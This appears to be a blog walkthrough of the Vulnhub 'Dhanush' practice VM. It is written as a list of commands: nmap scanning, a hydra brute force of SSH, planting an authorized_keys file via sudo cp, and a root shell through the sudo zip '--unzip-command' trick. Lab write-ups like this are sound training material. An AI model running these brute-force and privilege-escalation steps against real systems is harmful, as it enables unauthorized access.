Vulnhub Dhanush Walkthrough

We start scanning the host with nmap -A -T4 -p- 192.168.1.10 –vv

The host page is full of writings in English and some other writings, lets try cewl to grab these writings

Copy the text to a file and clear the ones you don’t want because there are a lot of user names we only need as a username file to brute force the ssh service on the port 65345.

hydra -L users.txt -P users.txt ssh://192.68.1.10:65345

now lets login using the username pinak and the password Gandiv

When running sudo –l it gave us a message

In the root directory of the user sarang there is a ssh folder but when trying to copy it it gave us a permission denied, to we going to generate out ssh keys and then copy them as the user sarang and use ssh with sarang username to get access to their folder.

ssh-keygen

cat /home/pinak/.ssh/id_rsa.pub > /home/pinak/authorized_keys

sudo -u sarang /bin/cp /home/pinak/authorized_keys /home/sarang/.ssh/authorized_keys

ssh sarang@127.0.0.1 -p 65345

Cd /tmp

touch test

sudo /usr/bin/zip test.zip test -T –unzip-command=”sh -c /bin/bash”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s